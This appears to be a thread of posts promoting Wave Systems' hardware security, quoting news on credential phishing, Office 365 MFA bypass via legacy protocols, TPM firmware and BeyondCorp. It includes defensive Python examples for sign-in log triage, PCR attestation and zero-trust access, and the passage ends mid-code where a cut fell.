The government hasn't opted for 'The Wave alternative' as part of its cybersecurity protection, and it seems like this is a missing link in its cybersecurity strategy.
https://www.wavesys.com/solutions
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.cyberscoop.com/dan-coats-hudson-institute/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=74346921&utm_medium=social&utm_source=twitter
The top U.S. intelligence official painted a grim picture on Friday of the many types of cyber threats the U.S. faces across critical infrastructure sectors and highlighted the ways the government is countering them.
“These attacks come in different forms. Some are tailored to achieve very tactical goals, while others are implemented for strategic purposes, including the possibility of a crippling cyber attack against our critical infrastructure,” said Director of National Intelligence Dan Coats, speaking at the Hudson Institute, a Washington, D.C. think tank.
“But all of these desperate efforts share a common purpose to exploit America’s openness in order to undermine our long-term competitive advantage.”
Coats said that U.S.’s digital infrastructure is under constant attack from foreign entities including China, Iran and North Korea, but he singled out Russia as the “most aggressive” one, highlighting the country’s reported efforts to use hacking and information campaigns to influence U.S. elections.
The director sought to clarify recent comments from a top DHS official, that suggested that the intelligence community has seen a decline in intent from Russia to interfere in future elections.
“I think there may have been some confusion on what we were seeing now compared to what we saw in 2016 because the Department of Homeland Security noted we are not yet seeing the kind of electoral interference in specific states and in voter databases that we experienced in 2016,” Coats said. “We are just one click of the keyboard away from a similar situation repeating itself.”
Coats’ talk took place within hours of the Department of Justice announcing new indictments of 12 Russian intelligence officers for allegedly hacking into the Democratic National Committee and other election-related entities in the run-up to the 2016 election.
But Coats also warned against having tunnel vision focused on the elections, noting that foreign actors continually target other aspects of U.S. critical infrastructure.
“DHS and FBI, in coordination with international partners, detected Russian government actors targeting government and businesses in the energy, nuclear, water, aviation, and critical manufacturing sectors. The warning signs are there. The system is blinking and it is why I believe we are at a critical point,” he said.
A silver lining that Coats pointed out is that the intelligence community is more integrated and better at sharing information across the 16 agencies that make it up than in past years. However, he said, challenges remain when it comes to coordination between the IC and the private sector organizations that are tapped into the threats U.S. infrastructure faces.
“The respective self-interest of the government, the private sector and the public have created independence rather than complementary lines of effort and awareness,” Coats said. “Everyone, if we are to succeed in dealing with this threat, must take ownership of the challenge.”
Coats noted that in order to actively counter the threats the country faces, President Donald Trump has authorized several actions, including attribution, criminal indictments and economic sanctions – all of which the administration has recently used.
The director said that the National Security Council, which plays a significant role in the White House’s cybersecurity strategy, is working to make sure the issue of foreign cyberthreats is a top priority for the White House despite being in a “transition period.”
“Transition” is not an understatement. Trump recently brought on John Bolton to replace H. R. McMaster as his national security adviser. Bolton ushered in a series of changes, including nixing the role of White House cybersecurity coordinator. Eliminating the role has been a contentious issue and lawmakers have urged the White House to reinstate it.
Credential Phishing – Easy Steps to Stymie Hackers
There are so many ways that Wave VSC 2.0 is better than the solutions offered up in this article. Interesting that the author used to work for the Army and doesn't mention Virtual Smart Cards or Windows Hello as an MFA solution. Given the author's initial line of, "I have to admit that I am a big fan of hardware-based tokens," virtual smart cards would seem like his next obvious recommendation.
https://securityboulevard.com/2018/07/credential-phishing-easy-steps-to-stymie-hackers/
Phishing attacks have become a common factor in our daily routines for businesses and in our personal lives. There are many different types of phishing attacks, each of which requires a slightly different defense while having some commonalities as well. This article covers a specific type of attack called credential phishing and ways to protect against it. While you may have heard of this type of attack, many people do not fully understand the different types of credential phishing, their goals, and how to defend against them. Time to remedy that!
Types of Credential Phishing Attacks
Generally speaking, most credential phishing attacks have a common, obvious purpose – to gather credentials from an individual. However, what attackers do with that information and the creativity used in the attack can vary greatly. In some cases, the credentials can be used to gain access to systems or network resources, while in others they can be used to take over bank accounts, social media accounts or email accounts. In any of these cases, the damage the attacker can do can be harmful to the organization or individual, both reputationally and financially.
A couple of months ago, I spent some time in Washington, DC, where I was honored to speak to members of several different House Subcommittees ranging from those focused on financial crimes and terrorism to consumer protection and intelligence services. After one of the briefings, I spent some time speaking with a member of the U.S. Secret Service. He told me a story about a case he just finished working. Sadly, this was a scenario that I already knew too well through others impacted by the same scenario.
In this case, the attacker was able to gain access to an individual’s email account through a credential phishing email. This victim worked in the real estate industry and was working on some reasonably large deals. The attacker stayed quiet and monitored the victim's emails for about a month before springing the attack. In this case, when it was time to transfer the escrow funds, the victim sent the account information for the transfer to the sender. Immediately afterward, the attackers made their move, and from the legitimate account of the victim, sent another email with a “correction” to the account number. The result was about $500,000 wired to the attacker’s bank account in another country, and it happened in the blink of an eye.
The FBI calls this kind of attack Business Email Compromise (BEC), and there are many different variations. This escrow/earnest money transfer attack is just one of many. Attacks diverting funds for invoice payments, false invoices being generated and sent from legitimate accounts, and malware being spread through legitimate, “trusted” accounts are just a few others I have seen. This doesn’t even touch on the CEO fraud versions of this type of attack, which occur when the “CEO” makes an urgent request for a funds transfer or to send tax forms for the employees. These attacks are so lucrative that Trend Micro is expecting the losses to exceed $9 billion by the end of this year, and the FBI had already tallied $5.3 billion in losses back in 2016.
In addition to these types of attacks, if you own the user’s email account, password resets for other types of accounts using that email address become trivial.
Fighting Back Against Credential Phishing
So, how do we fight back against these sorts of attacks? Generally speaking, the most effective countermeasures I have seen are:
1. Training the users to spot these attacks
2. Using Multi-Factor Authentication (MFA) to secure the accounts.
When it comes to training users to spot these attacks, we need to understand that the days of the Nigerian prince scams are largely behind us. Modern attacks are well designed and can be tough to recognize.
For example, the following credential phishing pages are from the KnowBe4 simulated phishing platform and are indicative of credential phishing pages used in the wild.
As you can see from the examples, these pages are made to look exactly like the real login pages for these services, and they can be easily hosted on any web server. Most of the time, when the user enters the credentials, the page not only captures those credentials, but it also forwards them to the actual login page, which then logs in the user, and they never know that they just gave up their credentials. Even in cases where the user is not automatically logged in, the page will usually just show a “Bad username or password” error, prompting him/her to log in again. Because all of us have mistyped a password before, this typically goes unnoticed and the user thinks they just fat-fingered the keys, once again leaving them oblivious to the harvesting of their credentials.
We must train users (and ourselves) to hover over the link in emails to ensure they are going to where they say they are, and to glance at the URL bar before ever entering login credentials on a page.
The second thing we need to do is to enable Multi-Factor Authentication (MFA) on these accounts wherever possible. This means not only do you need to have a username/password combination, but you also need to have another means of authentication. This can be biometrics, a text message to your phone, an authenticator app such as Google Authenticator, or, my favorite, a hardware token like a YubiKey.
When I worked for the U.S. Army, we used something called a Common Access Card (CAC) that contained a set of Personal Identity Verification (PIV) certificates that were tied to Active Directory. These PIV certs allowed us to digitally sign emails, encrypt emails, log in to computers on the domain, and even to control physical access to some areas in the buildings. These devices were a 2-Factor Authentication (2FA) device, as they required you to physically have the card, and also required you to know a PIN number to unlock the certificates on the card. Without one or the other, the operation would fail.
This same MFA principle should be applied to the email accounts of your users, especially the sensitive ones. Here are a few types of MFA to consider:
SMS
Using SMS as a second factor is a topic of debate amongst security professionals as cell phones/SIM cards can fairly easily be spoofed. Personally, I believe that something is better than nothing in this regard, so if this is the only option you have, go ahead and use it.
I will caution you, if you enable SMS as a second factor, avoid using numbers that are tied to services that forward SMS to email. For example, if I enable the SMS second factor in my Google account and have the message sent to my Google Voice number, I run the risk of it being more easily intercepted in email and potentially risk locking myself out of my account. Consider this, if I need the SMS message to get in to my Google account, and it’s being sent to my Google account… It’s just better to send it straight to a phone number. Trust me, I have learned from experience.
Software Authenticators
Another option is software-based authenticators such as Google Authenticator or Duo Security. These applications are typically set up using a “shared secret” key, which the app then uses to generate a numeric code you enter into the requesting application. For example, if I set this up as a second factor for my Google account, when I log in, I will be prompted to enter the code. I would open the app on the phone and enter the code for that account. Unlike SMS codes, the One-Time Password (OTP) code generated by this type of application has a short lifespan, typically about one minute, before expiring and generating a new code.
Hardware Tokens
I have to admit that I am a big fan of hardware-based tokens. When I used smart cards in the DoD, I gained a great deal of respect for the abilities of these devices. Typically, these hardware devices will be used to generate OTPs or will store the PIV certificates for that user. As I mentioned previously, these hardware generated codes or PIV certificates are a very strong authentication mechanism.
One problem that plagued smart cards in the DoD was a very high failure rate. Our organization had roughly 300 people using these cards with some users having multiple cards for different accounts. In this organization it was not uncommon to replace 2-3 cards a week due to failure. Smart cards have exposed contacts, much like newer chip-enabled credit cards, and require a special reader to be used.
For these reasons, I don’t recommend smart cards for the typical organization; however, there are other options that address these issues.
There are a lot of options for similar devices that can make these same improvements in security while being much easier to use and more reliable. A quick search on Amazon for FIDO U2F will give you some options to peruse. Be sure to pick the ones that support your required authentication protocols and methods.
I have been using a device called a YubiKey which is produced by Yubico. These devices act very much like smart cards but plug directly into a USB port and are much more reliable. I have used these devices to store Active Directory PIV certificates and for OTP generation as well. Some of these devices also allow for Near Field Communication (NFC) connectivity as well as USB connectivity. These support multiple authentication protocols and methods including FIDO2, WebAuthn, U2F, smart card (PIV), Yubico OTP, Code Signing, OpenPGP, OATH-TOTP, OATH-HOTP, and Challenge-Response.
Aside from a second factor for account authentication, one of my preferred use cases for these devices is securing password vaults such as LastPass. This allows for a very secure second factor to lock down the vault and associated passwords. The YubiKey Neo is handy, as it can be used through NFC to unlock the password vault even on cell phones.
Another consideration for these devices is the protection of very high-value accounts in Active Directory. I have used these to secure domain and enterprise administrator accounts using smart card login and PIV certificates, which have been natively supported since Windows 2000. That, however, is a topic for another post.
While these devices are typically pretty rugged and convenient, the cost and the requirement to physically have the device can be an issue. I have left my keychain with the YubiKey at home and left on a trip. This can be very inconvenient and can be a challenge to work around if you do not configure a backup method of authentication.
Setting Up MFA
Securing accounts with multi-factor authentication is becoming much easier as more and more vendors add native support for the technologies. Twitter, Facebook, Office 365, Dropbox, GitHub, Google, and many others already allow you to secure your accounts with MFA. Below are a few examples of what these pages look like when enabling MFA.
Summary
Credential phishing and BEC attacks are continuing to cripple organizations across the globe. The attacks are well planned and executed and often very stealthy. Combining high-quality end user training and multi-factor authentication can significantly reduce the risk of damages resulting from a successful credential phish. While this is not a solution to all of the issues surrounding credential phishing, requiring that additional layer of authentication that is tough for the attackers to obtain, can significantly reduce the risk of damage if a user is tricked into giving up their username and password.
The balance between usability and security is always tricky, but the industry as a whole is making it less painful when adding more layers of security. Therefore, review the available options for multi-factor authentication, especially for high value accounts and especially for all email accounts, and your organization as well as you as an individual should enable this additional security wherever possible. Strongly consider the addition of a password vault system as well, which can reduce password reuse across sites and allows for quick, easy password changes.
While nothing is 100% secure, most of these setups are extremely difficult to break. Any determined attacker can eventually get their target. However, these simple measures go a very long way in helping you rise above being the low hanging fruit, making the bad guys simply go on to an easier mark.
Two-factor auth totally locks down Office 365? You may want to check all your services...
A great solution to the problem below. imo.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.theregister.co.uk/2018/07/13/2fa_o365_bypass_attacks/
A network's only as strong as its weakest link or worker
Hackers can potentially obtain access to Microsoft Office 365 emails and calendars even if multi-factor-authentication is in place, we were warned this week.
Cybercrooks are able to force their way into corporate Office 365 accounts, bypassing single sign-on or multi-factor authentication, by targeting older systems that aren't well protected, email security biz Proofpoint has argued.
The trick, we're told, is to target legacy services that use weak or known passwords, are not secured behind multi-factor-authentication, and, once commandeered, can be used to poke around inside a corporate structure. If you don't know a target's password, it could be phished via email or instant message.
This all may seem obvious, but apparently some people are being stung by it.
"The current wave of attacks mostly goes after Exchange Web Services and ActiveSync," said Ryan Kalember, Proofpoint's senior vice president of cybersecurity strategy, earlier this week. "A little real-time phishing gets mixed in, but is usually not necessary."
Real-world examples
For example, Proofpoint said it recently saw an attacker access the Office 365 account of the chief exec of a 15,000-user financial services and insurance firm. The hacker viewed the CEO's emails and calendar in order to sniff out an opportunity to run a sneaky scam.
At the same time the chief exec was in scheduled meetings with suppliers, the intruder used the compromised account to send an email to the chief financial officer asking for funds to be shifted. The unnamed financial services firm lost $1m over the course of several transfers, it is claimed.
Compromised Office 365 accounts in a 75,000-user real-estate investment biz were used to run another scam. Five executives, including some regional general managers, had their accounts compromised. With access to their Office 365 email, attackers managed to change the ABA routing numbers for corporate funds. The company lost over $500,000 as a result, according to Proofpoint.
By the most remarkable of coincidences, the security shop has released something called Proofpoint Cloud Account Defense (CAD) to detect and proactively protect against compromised Microsoft Office 365 accounts. Kalember explained the need for additional layers of defenses.
"It's really hard for most orgs to cover all the interfaces to Exchange with MFA [multi-factor authentication]," Kalember told El Reg.
"Particularly with EWS [Exchange Web Services], you need to be 1) fully migrated to O365, 2) use Microsoft's own MFA, and 3) in Modern Authentication mode. The tech can't support native iOS/Android mail clients, etc."
In other words, you may think you're fully protected – but maybe you should double check, and increase defenses for all service interfaces, particularly concerning Exchange Web Services. Save yourself some pain in the future. ®
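The gap Kalember describes is visible in sign-in telemetry: a mailbox protocol that predates Modern Authentication authenticates with a password only, so the record carries no MFA requirement even for a user whose browser logins do. The following added example (not from The Register or Proofpoint) triages a handful of constructed Office 365 sign-in records for exactly that pattern; the JSON field names follow the Azure AD sign-in log export as understood here and are an assumption, as is the error code used for a failed password.

```python
"""Added example: find password-only legacy-protocol mailbox access in constructed
Office 365 sign-in records. Field names follow the Azure AD sign-in export as
understood by the author of this example (an assumption, not a documented contract)."""
import json
from collections import defaultdict

# Protocols that cannot prompt for a second factor; EWS and ActiveSync are the ones the article names
LEGACY_CLIENTS = {"Exchange ActiveSync", "Exchange Web Services", "IMAP4", "POP3",
                  "Authenticated SMTP", "Other clients"}

# Constructed sample: one line per sign-in, Azure AD style. 50126 is assumed to mean "bad password".
SAMPLE_LOG = """\
{"createdDateTime":"2018-07-12T08:01:10Z","userPrincipalName":"ceo@example.com","clientAppUsed":"Browser","authenticationRequirement":"multiFactorAuthentication","status":{"errorCode":0},"ipAddress":"203.0.113.10"}
{"createdDateTime":"2018-07-12T08:03:42Z","userPrincipalName":"ceo@example.com","clientAppUsed":"Exchange Web Services","authenticationRequirement":"singleFactorAuthentication","status":{"errorCode":0},"ipAddress":"198.51.100.77"}
{"createdDateTime":"2018-07-12T08:04:01Z","userPrincipalName":"cfo@example.com","clientAppUsed":"Exchange ActiveSync","authenticationRequirement":"singleFactorAuthentication","status":{"errorCode":50126},"ipAddress":"198.51.100.77"}
{"createdDateTime":"2018-07-12T08:04:05Z","userPrincipalName":"cfo@example.com","clientAppUsed":"Exchange ActiveSync","authenticationRequirement":"singleFactorAuthentication","status":{"errorCode":50126},"ipAddress":"198.51.100.77"}
{"createdDateTime":"2018-07-12T08:04:09Z","userPrincipalName":"cfo@example.com","clientAppUsed":"Exchange ActiveSync","authenticationRequirement":"singleFactorAuthentication","status":{"errorCode":0},"ipAddress":"198.51.100.77"}
{"createdDateTime":"2018-07-12T09:15:00Z","userPrincipalName":"dev@example.com","clientAppUsed":"Mobile Apps and Desktop clients","authenticationRequirement":"multiFactorAuthentication","status":{"errorCode":0},"ipAddress":"203.0.113.22"}
"""


def parse_signins(text: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_legacy(rec: dict) -> bool:
    return rec.get("clientAppUsed") in LEGACY_CLIENTS


def succeeded(rec: dict) -> bool:
    return rec.get("status", {}).get("errorCode") == 0


def single_factor_legacy_successes(records: list) -> list:
    """Every hit is a mailbox session that was opened without an MFA prompt."""
    return [r for r in records
            if is_legacy(r) and succeeded(r)
            and r.get("authenticationRequirement") != "multiFactorAuthentication"]


def users_with_mfa_gap(records: list) -> list:
    """Users who look MFA-protected in the browser yet were reached over password-only legacy protocols."""
    mfa_users, gap_users = set(), set()
    for r in records:
        if not succeeded(r):
            continue
        if r.get("authenticationRequirement") == "multiFactorAuthentication":
            mfa_users.add(r["userPrincipalName"])
        elif is_legacy(r):
            gap_users.add(r["userPrincipalName"])
    return sorted(mfa_users & gap_users)


def legacy_failures_by_ip(records: list, threshold: int = 2) -> dict:
    """Repeated failed legacy-protocol logons from one source, the usual prelude to a success."""
    counts = defaultdict(int)
    for r in records:
        if is_legacy(r) and not succeeded(r):
            counts[r["ipAddress"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    recs = parse_signins(SAMPLE_LOG)
    for hit in single_factor_legacy_successes(recs):
        print("password-only mailbox access:", hit["userPrincipalName"], hit["clientAppUsed"], hit["ipAddress"])
    print("MFA users still reachable via legacy auth:", users_with_mfa_gap(recs))
    print("legacy failures by source:", legacy_failures_by_ip(recs))
```

Running this over real exports answers the article's "double check" for each user: an empty gap list means every successful session saw MFA, anything else names the interface still to close.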
From computers to mobile - The TPM could be ready to shine!
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. http://ow.ly/O2Rc30kUnhr
see post 245219 as well.
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. https://t.co/bbSRotmudl
— Trusted Computing (@TrustedComputin) July 11, 2018
American Megatrends Adds TPM Support on Arm-based Systems Running Aptio® V UEFI Firmware
see wavesys.com for Wave Endpoint Monitor
https://ami.com/en/news/press-releases/american-megatrends-adds-tpm-support-on-armbased-systems-running-aptio-v-uefi-firmware/
Wednesday, May 2, 2018
NORCROSS, GEORGIA – American Megatrends Inc. (AMI), a global leader in BIOS and UEFI firmware, server and remote management tools, data storage products and unique solutions based on the Linux® and Android™ operating systems, is pleased to announce support for TPM on Arm®-based systems running AMI’s flagship Aptio® V UEFI Firmware.
The Trusted Platform Module (TPM) is defined in the TPM Main specification created by the Trusted Computing Group, which enables trust in computing platforms. TPM can be used to measure the code that will be executed (known as measured boot), authenticate and secure platforms using passwords, certificates, digital signatures and/or encryption keys. Incorporating TPM provides an extra layer of security to ensure that important information is not prone to outside software attacks and/or unauthorized updates.
Previously, AMI only provided TPM support for x86 platforms. With the growing need to extend TPM support for additional platforms, AMI has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. The added TPM support for Arm-based systems includes features specifically for the Arm architecture such as TPM driver support within Arm® TrustZone® technology and Linux OS support. The Arm TrustZone TPM Firmware can be accessed by the BIOS and OS via the Command Response Buffer interface using Secure Monitor calls. Other generic features supported by TPM include cryptographic algorithms and measurement of SecureBoot variables.
American Megatrends and Wave to Extend UEFI Support in Windows 8 for BIOS Malware Detection
Friday, February 24, 2012
https://ami.com/en/news/press-releases/american-megatrends-and-wave-to-extend-uefi-support-in-windows-8-for-bios-malware-detection/
Central to Windows 8 is the use of Aptio®, AMI’s solution for UEFI (Unified Extensible Firmware Interface), which represents an overhaul of the computer boot environment while still bearing similarities to the legacy BIOS (Basic Input Output System) it replaces. The UEFI specification introduces advanced firmware features, defining boot and runtime protocols for communication between services and device drivers, and offers a standard interface to the operating system. Providing standardized access to boot data optionally stored on either NAND flash or on a hard drive, Aptio provides more space for boot-time diagnostics and running utilities. The result is dramatically faster boot-up times and better performance.
Windows 8 takes advantage of UEFI secure boot architecture to enhance the operating system’s security capabilities. Secure boot allows only signed software to run on the device, adds cryptographic checks to each stage of the boot process and asserts the integrity of all the software images that are executed to prevent unauthorized, modified software from running. Wave solutions report on the execution of the secure boot and verify that anti-malware software has been launched before any third-party boot drivers to prevent malware from bypassing inspection.
Building a “chain of trust” requires the collaboration of multiple partners. AMI provides the first step in the trust chain by assuring that the BIOS components are registered and signed prior to the delivery of the platform. As the computer boots, each component reports its status to the Trusted Platform Module (TPM), which securely records the status measurements. This provides a critical first step that sets the stage for a more trustworthy computing environment.
Wave constitutes the next link in the trust chain with solutions designed to assure that the integrity of the secure boot is reported and attested to the enterprise network or Cloud service. Wave Endpoint Monitor, currently deployed in beta testing, uses the TPM to report on the success of the secure boot and leverages the chip to prove that the process has executed correctly. Endpoint Monitor can then prove to a Cloud service or to an enterprise application that the PC has booted in a known, good state. If a platform is compromised, IT can determine which machine is infected, and take steps to prevent it from accessing sensitive systems to ensure that critical systems and data remain safe.
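The measurement chain that both press releases describe (measured boot in the 2018 release, "each component reports its status to the TPM" in this one) rests on a single TPM operation. This added example, which is not AMI's or Wave's code, models it in software: every boot component's hash is folded into a Platform Configuration Register with the extend rule PCR = H(PCR || H(component)), and a verifier compares the final value with a golden value recorded from a known-good boot, then uses the event log to name the component that changed. The component blobs, their names and the golden values are constructed for the demo; a real TPM 2.0 PCR bank applies the same rule with its chosen hash, SHA-256 here.

```python
"""Added example: TPM-style PCR extend, event-log replay and golden-value attestation.
Boot component contents below are constructed stand-ins, not real firmware images."""
import hashlib


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def pcr_extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM extend: a PCR can only be updated by hashing a new value into it, never overwritten."""
    return sha256(pcr + measurement)


def measure_boot(components: list) -> tuple:
    """Walk the boot chain in order. Returns (final PCR, event log of (name, digest hex))."""
    pcr = bytes(32)  # PCRs reset to all-zero at power-on
    event_log = []
    for name, blob in components:
        digest = sha256(blob)
        event_log.append((name, digest.hex()))
        pcr = pcr_extend(pcr, digest)
    return pcr, event_log


def replay_event_log(event_log: list) -> bytes:
    """A verifier recomputes the PCR from the log; a log that does not replay to the quoted PCR was edited."""
    pcr = bytes(32)
    for _name, digest_hex in event_log:
        pcr = pcr_extend(pcr, bytes.fromhex(digest_hex))
    return pcr


def attest(pcr: bytes, golden: bytes, event_log: list, golden_log: list) -> list:
    """Empty list means the platform booted in the known-good state; otherwise the suspect components."""
    if pcr == golden:
        return []
    known = dict(golden_log)
    seen = dict(event_log)
    diffs = [name for name, digest in event_log if known.get(name) != digest]
    diffs += [name for name in known if name not in seen]
    return diffs or ["measurement order changed"]


# Constructed stand-ins for the images a real boot would measure, in boot order
GOOD_BOOT = [
    ("SEC/PEI core", b"constructed-sec-pei-image"),
    ("DXE drivers", b"constructed-dxe-driver-volume"),
    ("Secure Boot db/dbx", b"constructed-db-and-dbx-contents"),
    ("OS boot loader", b"constructed-signed-os-loader"),
    ("Early-launch anti-malware", b"constructed-signed-elam-driver"),
]
# Same chain with one driver volume altered, as a firmware rootkit would
TAMPERED_BOOT = [(n, b"constructed-dxe-driver-volume+implant") if n == "DXE drivers" else (n, b)
                 for n, b in GOOD_BOOT]


if __name__ == "__main__":
    golden, golden_log = measure_boot(GOOD_BOOT)
    pcr, log = measure_boot(TAMPERED_BOOT)
    print("healthy boot:", attest(golden, golden, golden_log, golden_log))   # []
    print("tampered boot:", attest(pcr, golden, log, golden_log))           # ['DXE drivers']
    print("log replays to PCR:", replay_event_log(log) == pcr)               # True
```

Because the PCR lives in the chip and is only ever extended, malware that rewrites the software event log after the fact cannot make it replay to the quoted value, which is why the attestation trusts the TPM rather than the OS-held log.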
“Securing the computer from power on is critical to the defense of intellectual property and the corporate infrastructure,” remarked S. Shankar, President and CEO of American Megatrends. “AMI is pleased to provide Microsoft with the foundation of security for Windows 8, and to work with Wave to extend security capabilities that wouldn’t have been possible in a legacy environment.”
Steven Sprague, Wave’s CEO commented, “AMI and PC manufacturers offer great assurance that the UEFI components are trusted when delivered to the customer. Wave provides IT with a greater level of knowledge and trust in the boot process and assurances that only known devices are on the network. Knowing the identity of the machine and assuring the health of its BIOS represent significant strides forward in combating advanced persistent threats.”
AMI has spent the last year supporting the launch of Windows 8 by ensuring that AMI’s Aptio UEFI firmware is in full compliance with the latest UEFI specification, UEFI 2.3.1. New features include pre-OS security, speed and secure boot. AMI is also working with PC OEMs, developers and partners such as Wave by providing UEFI development PCs for testing within a Windows 8 ecosystem. AMI has worked in partnership with Microsoft to develop this system in order to facilitate the rapid development of Windows 8 throughout the entire developer community. These new UEFI development PCs are powered by the latest version of Aptio, version 4.6.5.1, which not only offers full support for Windows 8, but also adds support for the latest UEFI specifications, UEFI 2.3.1 and PI 1.2. This makes the latest features of the UEFI specification, such as Secure Boot, UEFI boot mode, fully localizable user interface and more, available to manufacturers in a production-ready UEFI BIOS. Notably, this development system will be the first PC on the market with full UEFI 2.3.1 support, allowing for a complete Windows 8 experience.
In preparation for Windows 8 availability, Wave is using some of the capabilities of the TPM to enable an enterprise infrastructure to support the features in Windows 8 that take advantage of UEFI capabilities. Enterprises stand to benefit from a tool that can detect rootkits, assure the core capabilities of a platform and establish very strong device identity—capabilities that have been missing for the last 20 years and critical to establishing a more trustworthy computing environment.
Phone in the right hand? You're a hacker!
How effective, really, is continuous monitoring/automation and assuming all users in the network are hostile (Beyond Corp) vs. only known devices being allowed on certain parts of the network? The moat approach (anti virus and firewalls) isn't very effective either. imo. Wave's website has the following excerpt:
https://www.wavesys.com/solutions
Much of the complexity, stress, and expense of data protection stems from hanging on to a failed, 20th-century approach to the problem. Namely, piling on layers of software in an attempt to keep the bad guys and their viruses out. But there is no “in” to keep them out of anymore. Consider today’s increasingly mobile workforce, the proliferation of personal devices, and the growing use of web applications—all of which cyber criminals have learned to take advantage of.
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.bbc.com/news/technology-44438808
Hackers are finding it too easy to circumvent traditional cyber defences, forcing businesses to rethink their security strategies. Many firms are now harnessing big data and adopting cutting edge verification checks. In fact, some can even identify you by how quickly you type your computer keys, or how you hold your mobile phone.
In these days of regular space travel, nanotechnology and quantum computers it is easy to believe we live in an age plucked from the pages of a science-fiction novel.
But there are some aspects of this shiny, computer-powered era that look more feudal than futuristic.
Consider the way many organisations protect themselves and their staff from cyber-attacks.
Many approach cyber-security like a medieval king would have tackled domestic security - by building a castle to protect themselves, says Dr Robert Blumofe, a senior manager at cloud services firm Akamai.
The high walls, moat and drawbridge are the security tools, anti-virus and firewalls they use to repel the barbarians at the gates trying to breach their cyber defences.
"But now," Dr Blumofe says, "that castle metaphor is really starting to break down."
Outer defences
The first issue is mobility. Digital fortifications worked well when all staff sat at desks, used desktop computers and were concentrated in a few buildings.
But now many work from home, airports or coffee shops and use their laptops, tablets and phones on the go, to work at all times of day.
The second problem, Dr Blumofe says, is that many firms wrongly assume that those inside their castle walls can be trusted and are "safe".
This leaves many firms dangerously exposed, agrees John Maynard, European head of cyber-security for Cisco.
"Typically once attackers have penetrated a trusted network they find it is easy to move laterally and easy to get to the crown jewels.
"That's because all the defences point outward. Once on the inside there is usually little to stop attackers going where they want to."
Tumbling walls
In a bid to get beyond this outdated thinking many organisations have torn down the old castle walls in favour of a model known as the "Beyond Corp" approach.
It was pioneered by Google in response to a series of cyber-attacks in 2009 called Aurora orchestrated by China-backed hackers. The attackers went after Google as well as Adobe, Yahoo, Morgan Stanley, Dow Chemical and many other large firms.
According to Mr Maynard, Beyond Corp assumes every device or person trying to connect to a network is hostile until they are proven otherwise.
And it obtains this proof by analysing external devices, how they are being used and what information they are submitting.
This encompasses obvious stuff such as login names and passwords, as well as where someone logs in from; but it also relies on far more subtle indicators, says Joe Pindar, a security strategist at Gemalto.
"It can be how quickly do you type the keys, are you holding the device in your right or left hand. How an individual uses a device acts as a second layer of identity and a different kind of fingerprint."
Gathering, storing and analysing all that data on those individual quirks of usage was the type of big data problem only a tech-savvy company such as Google could tackle at the time of the Aurora attacks, says Mr Pindar.
However, as familiarity with big data sets has spread, many more big firms are adopting the Beyond Corp approach when organising their digital defences, he says.
One big advantage is that Beyond Corp turns a firm's network into an active element of defence, says Mr Maynard from Cisco.
"In the castle and moat approach the network was passive... But Beyond Corp involves continuous monitoring where you are constantly using the network as a sensor or a way to get telemetry about what's going on."
The analysis done when users join a network makes it much easier to spot when attackers are trying to get access. That's because the authentication step will flag any anomalies, meaning security staff will quickly learn that something suspicious is going on. Anything other than normal login behaviour will stand out.
Faster detection
It can also mean a "significant reduction" in time to detect threats, says Mr Maynard.
"The industry average is about 100 days to spot threats. With Beyond Corp you should be down to hours not days."
In addition, Beyond Corp can "limit the blast radius" if a breach does happen, says Stephen Schmidt, chief security officer at Amazon's AWS cloud service.
This is because it usually involves dividing up a company's internal network so users only get access to applications they are approved to use.
The mass of data gathered on users, their devices and the way they act once they have connected may appear bewildering to many companies.
However, advances in automation are increasingly helping them keep a handle on the millions of events that now occur on their systems.
"If you are expecting to secure your estate by having humans watch TV screens you are probably going to be too late to spot it," says Mr Schmidt. "Human reactions are always going to be much slower than automation."
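The article describes the Beyond Corp idea in words only. The following is an added example, not code from the BBC article or from Google's BeyondCorp: a toy access-proxy decision that treats every request as untrusted until the device, the user's second factor and the login context earn a trust tier, and that records the evidence so each decision doubles as telemetry. The tier names, the device attributes, the application table and the user baseline are all constructed for the demo.

```python
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class Device:
    managed: bool          # enrolled in the corporate device inventory
    disk_encrypted: bool
    patch_age_days: int    # days since the OS was last patched
    has_device_cert: bool  # holds a certificate issued to this specific machine


@dataclass
class Request:
    user: str
    mfa_passed: bool
    device: Device
    source_country: str
    app: str
    at: datetime           # UTC time of the request


@dataclass
class Baseline:
    """What 'normal' looks like for one user (constructed for the demo)."""
    usual_countries: frozenset
    usual_hours_utc: frozenset


# Minimum trust tier each application accepts (constructed policy table).
APP_MIN_TIER = {"wiki": 1, "source-code": 2, "payroll": 3}


def stamp(hour):
    """Helper for the demo: a UTC timestamp on a fixed date."""
    return datetime(2018, 7, 9, hour, tzinfo=timezone.utc)


def device_tier(d: Device) -> int:
    """0 = unknown device, 1 = managed, 2 = managed + encrypted + patched,
    3 = tier 2 plus a device certificate proving which machine this is."""
    if not d.managed:
        return 0
    if not (d.disk_encrypted and d.patch_age_days <= 30):
        return 1
    return 3 if d.has_device_cert else 2


def login_anomalies(req: Request, base: Baseline) -> list:
    """Context signals outside the user's normal pattern: the 'anything other
    than normal login behaviour' of the article. They are returned whether or
    not the request is denied, so the SOC sees them either way."""
    flags = []
    if req.source_country not in base.usual_countries:
        flags.append("unusual-country")
    if req.at.hour not in base.usual_hours_utc:
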